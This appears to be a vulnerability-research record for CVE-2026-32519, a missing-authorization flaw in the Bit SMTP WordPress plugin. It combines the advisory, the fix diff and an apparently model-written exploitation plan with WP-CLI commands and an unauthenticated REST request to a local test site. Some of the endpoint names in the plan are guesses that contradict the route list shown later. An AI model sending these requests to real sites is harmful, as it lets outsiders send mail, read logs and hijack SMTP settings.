[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9shH5GjfdaR3_elAHWVkZA5at7d4RH_oxWGqILvwmz0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-32519","bit-smtp-easy-smtp-solution-with-email-logs-missing-authorization","Bit SMTP – Easy SMTP Solution with Email Logs \u003C= 1.2.2 - Missing Authorization","The Bit SMTP – Easy SMTP Solution with Email Logs plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to perform an unauthorized action.","bit-smtp",null,"\u003C=1.2.2","1.2.3","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-20 00:00:00","2026-03-27 18:13:03",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9da38075-2268-4f98-b02c-0c7c34e16d85?source=api-prod",8,[22,23,24,25],"assets\u002F@emotion\u002Freact-528d86a2.js","assets\u002F@tanstack\u002Freact-query-ca364c09.js","assets\u002Fantd-52e27ed6.js","assets\u002Fbf-104-2.svg","researched",false,3,"# Research Plan: CVE-2026-32519 - Bit SMTP Missing Authorization\n\n## 1. Vulnerability Summary\nThe **Bit SMTP** plugin for WordPress (versions \u003C= 1.2.2) is vulnerable to **Missing Authorization**. This occurs because the plugin registers REST API endpoints (or AJAX handlers) meant for administrative tasks (like sending test emails or updating SMTP configurations) but fails to implement a `permission_callback` that verifies the user has the `manage_options` capability. Consequently, an unauthenticated attacker can trigger these functions remotely.\n\nGiven the plugin's architecture (using React, Ant Design, and TanStack Query as seen in the provided assets), the backend logic is primarily handled via the **WordPress REST API**.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: REST API route (Inferred: `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Ftest-email` or `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fsend-test-email`).\n*   **Method**: `POST`\n*   **Authentication**: None (Unauthenticated).\n*   **Preconditions**: The plugin must be active. If the endpoint requires a REST nonce, it must be obtainable from the frontend.\n*   **Payload**: JSON object containing SMTP test parameters or target email addresses.\n\n## 3. Code Flow (Inferred)\n1.  **Registration**: The plugin uses the `rest_api_init` hook to register routes.\n2.  **Vulnerable Route**: A route (e.g., `bit-smtp\u002Fv1\u002Ftest-email`) is registered.\n3.  **Missing Check**: The `register_rest_route` call either:\n    *   Omits the `permission_callback` argument entirely.\n    *   Sets `permission_callback` to `__return_true`.\n    *   Only checks for a valid nonce but does not verify user capabilities (`current_user_can('manage_options')`).\n4.  **Execution**: The callback function (likely in a `ConfigController` or `SmtpController`) executes administrative logic (sending an email) for any requester.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability is \"Missing Authorization,\" WordPress REST API routes often require a `_wpnonce` for the `wp_rest` action to prevent CSRF.\n\n1.  **Identify Localization**: Bit Apps plugins typically localize variables into a global JS object. Based on common patterns for this developer, look for `bitSmtpVars` or `bitsmtp_vars`.\n2.  **Create Trigger Page**: The plugin's scripts (and nonces) are usually loaded on the plugin's admin page. However, we need a way to get it unauthenticated. Check if the plugin enqueues scripts on the frontend (e.g., via a shortcode). \n    *   Check for shortcodes: `wp eval \"print_r( $GLOBALS['shortcode_tags'] );\"`\n    *   If a shortcode like `[bit-smtp]` or `[bit_smtp]` exists, create a page:\n        `wp post create --post_type=page --post_status=publish --post_content='[bit-smtp]'`\n3.  **Extract Nonce**:\n    *   Navigate to the created page or the homepage.\n    *   Use `browser_eval` to find the nonce:\n        ```javascript\n        window.bitSmtpVars?.nonce || window.bitsmtp_ajax?.nonce\n        ```\n4.  **Alternative (Common for Bit Apps)**: If the plugin is purely for admin use, the nonce might not be on the frontend. In that case, check if the endpoint is accessible *without* a nonce (some `GET` routes or improperly configured `POST` routes allow this).\n\n## 5. Exploitation Strategy\nThe goal is to trigger the unauthorized sending of a test email, demonstrating the ability to use the server's mail-sending capabilities.\n\n**Step 1: Discover the Exact Route**\nRun the following to find the `bit-smtp` routes and their required permissions:\n```bash\nwp eval 'foreach( $GLOBALS[\"wp_rest_server\"]->get_routes(\"bit-smtp\u002Fv1\") as $path => $data ) { echo \"Path: $path\\n\"; print_r($data[0][\"permission_callback\"]); }'\n```\n\n**Step 2: Prepare the Payload**\nAssuming the route is `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fsend-test-email`, the payload usually requires:\n*   `to`: An email address under your control.\n*   `subject`: \"CVE-2026-32519 PoC\"\n*   `message`: \"Exploit Successful\"\n\n**Step 3: Send the Request**\nUsing the `http_request` tool:\n```json\n{\n  \"method\": \"POST\",\n  \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fsend-test-email\",\n  \"headers\": {\n    \"Content-Type\": \"application\u002Fjson\",\n    \"X-WP-Nonce\": \"EXTRACTED_NONCE_OR_OMIT\"\n  },\n  \"data\": {\n    \"to\": \"attacker@example.com\",\n    \"subject\": \"Unauthorized Test Email\",\n    \"body\": \"This email was sent via an unauthenticated REST API call.\"\n  }\n}\n```\n\n## 6. Test Data Setup\n1.  **Install Plugin**: `wp plugin install bit-smtp --version=1.2.2 --activate`\n2.  **Configure SMTP (Optional)**: If the plugin requires configuration before sending, use WP-CLI to set dummy options:\n    `wp option update bit_smtp_options '{\"host\":\"localhost\",\"port\":\"25\",\"user\":\"\",\"pass\":\"\",\"type\":\"smtp\"}'` (Note: exact option name may vary; check `wp option list | grep smtp`).\n3.  **Public Page**: Create a page to check for leaked nonces if necessary.\n\n## 7. Expected Results\n*   **HTTP Response**: `200 OK` or `201 Created`.\n*   **Body**: A JSON response indicating success, e.g., `{\"success\": true, \"data\": \"Email sent successfully\"}`.\n*   **Action**: The WordPress instance attempts to send an email (can be verified via logs).\n\n## 8. Verification Steps\n1.  **Check Mail Logs**: If a mail logging plugin is installed (or the Bit SMTP internal logs are used), check for the unauthorized email:\n    `wp eval \"global $wpdb; print_r( $wpdb->get_results(\\\"SELECT * FROM {$wpdb->prefix}bit_smtp_logs ORDER BY id DESC LIMIT 1\\\") );\"`\n2.  **Verify Capability Failure**: Try the same request on a patched version (1.2.3) and confirm it returns `401 Unauthorized` or `403 Forbidden`.\n\n## 9. Alternative Approaches\nIf the `send-test-email` endpoint is not vulnerable, try:\n*   **Log Access**: `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fget-logs` (Information Disclosure).\n*   **Settings Update**: `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fupdate-config` (Integrity breach). \n    *   Payload: Change the `from_email` or SMTP credentials to an attacker-controlled server.\n*   **Check AJAX**: If REST routes are properly protected, search for `wp_ajax_nopriv_bit_smtp` actions in the source code using `grep -r \"wp_ajax_nopriv\"`.","The Bit SMTP plugin for WordPress is vulnerable to unauthorized access because it fails to apply authorization middleware to its REST API routes in versions up to 1.2.2. This allows unauthenticated attackers to perform administrative actions such as sending test emails, modifying SMTP configurations, and viewing email logs.","\u002F* backend\u002Fapp\u002FProviders\u002FHookProvider.php *\u002F\n\nif (isset($this->_pluginBackend)\n    && RequestType::is(RequestType::API)\n) {\n    $router = new Router(RequestType::API, Config::SLUG, 'v' . Config::API_VERSION);\n\n    include $this->_pluginBackend . 'hooks' . DIRECTORY_SEPARATOR . 'api.php';\n    $router->register();\n}\n\n---\n\n\u002F* backend\u002Fhooks\u002Fapi.php *\u002F\n\nRoute::group(function () {\n    Route::post('mail\u002Fconfig\u002Fsave', [SMTPController::class, 'saveMailConfig']);\n    Route::get('mail\u002Fconfig\u002Fget', [SMTPController::class, 'index']);\n    Route::post('mail\u002Ftest\u002Femail', [SMTPController::class, 'sendTestEmail']);\n    Route::get('mail\u002Flogs', [LogController::class, 'index']);\n    Route::post('mail\u002Flogs\u002Fdelete', [LogController::class, 'destroy']);\n    Route::post('telemetry\u002Fsave', [TelemetryPopupController::class, 'saveTelemetry']);\n});","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.2\u002Fbackend\u002Fapp\u002FHTTP\u002FMiddleware\u002FNonceCheckerMiddleware.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.3\u002Fbackend\u002Fapp\u002FHTTP\u002FMiddleware\u002FNonceCheckerMiddleware.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.2\u002Fbackend\u002Fapp\u002FHTTP\u002FMiddleware\u002FNonceCheckerMiddleware.php\t2025-11-08 13:27:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.3\u002Fbackend\u002Fapp\u002FHTTP\u002FMiddleware\u002FNonceCheckerMiddleware.php\t2026-02-20 10:00:30.000000000 +0000\n@@ -11,10 +10,6 @@\n {\n     public function handle(Request $request, ...$params)\n     {\n-        if (!$request->has('_ajax_nonce') || !wp_verify_nonce(sanitize_key($request->_ajax_nonce), Config::VAR_PREFIX . 'nonce')) {\n-            return Response::error('Invalid token')->httpStatus(411);\n-        }\n-\n         if (!Capabilities::check('manage_options')) {\n             return Response::error([])->message('unauthorized access');\n         }\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.2\u002Fbackend\u002Fapp\u002FProviders\u002FHookProvider.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.3\u002Fbackend\u002Fapp\u002FProviders\u002FHookProvider.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.2\u002Fbackend\u002Fapp\u002FProviders\u002FHookProvider.php\t2025-11-08 13:27:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbit-smtp\u002F1.2.3\u002Fbackend\u002Fapp\u002FProviders\u002FHookProvider.php\t2026-02-20 10:00:30.000000000 +0000\n@@ -32,6 +32,7 @@\n             && RequestType::is(RequestType::API)\n         ) {\n             $router = new Router(RequestType::API, Config::SLUG, 'v' . Config::API_VERSION);\n+            $router->setMiddlewares(Plugin::instance()->middlewares());\n \n             include $this->_pluginBackend . 'hooks' . DIRECTORY_SEPARATOR . 'api.php';\n             $router->register();","An unauthenticated attacker can exploit this vulnerability by directly making requests to the plugin's REST API endpoints. \n\n1. Identify the site's REST API base URL (typically `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002F`).\n2. To send an unauthorized email, send a POST request to `\u002Fwp-json\u002Fbit-smtp\u002Fv1\u002Fmail\u002Ftest\u002Femail` with a JSON payload containing the target 'to' address, 'subject', and 'message'.\n3. Because the vulnerable versions (\u003C= 1.2.2) fail to attach the `NonceCheckerMiddleware` to the API router, the request will process without verifying a nonce or checking if the user has `manage_options` capabilities, resulting in the plugin executing the administrative action.","gemini-3-flash-preview","2026-04-18 02:01:16","2026-04-18 02:02:27",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.2.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbit-smtp\u002Ftags\u002F1.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbit-smtp.1.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbit-smtp\u002Ftags\u002F1.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbit-smtp.1.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbit-smtp\u002Ftags"]